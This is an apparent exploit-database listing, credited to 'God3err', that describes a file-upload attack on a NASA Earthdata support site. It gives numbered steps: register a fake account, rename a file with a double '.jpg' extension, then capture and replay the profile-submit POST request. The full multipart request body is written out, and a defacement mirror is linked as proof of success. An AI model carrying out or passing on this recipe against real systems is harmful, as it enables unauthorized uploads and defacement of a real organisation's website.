NASA Submit Upload Exploit

2018.08.07
tr God3err (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

NASA Submit Upload Exploit Founder : God3err 1) Open site https://support.earthdata.nasa.gov/ 2) Create fake account 3) Install Live HTTP Headers and HTTP Requester 4) Open Live HTTP Header and rename index.html.jpg 5) Upload this file 6) Copy POST Request 7) Paste HTTP Requester and POST :)) POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit -----------------------------25505821327763\r\n Content-Disposition: form-data; name="salutation"\r\n \r\n 0\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="fullname"\r\n \r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="userorganization"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="userdesignation"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="phone"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n Content-Type: image/jpeg\r\n \r\n Exploited By God3err\r\n NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n Success E.g http://overflowzone.com/mirror/84863/ Video : https://youtu.be/2pL0_bEXhNc Website : god3err.pw

References:

https://youtu.be/2pL0_bEXhNc


Vote for this issue:
100%
0%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top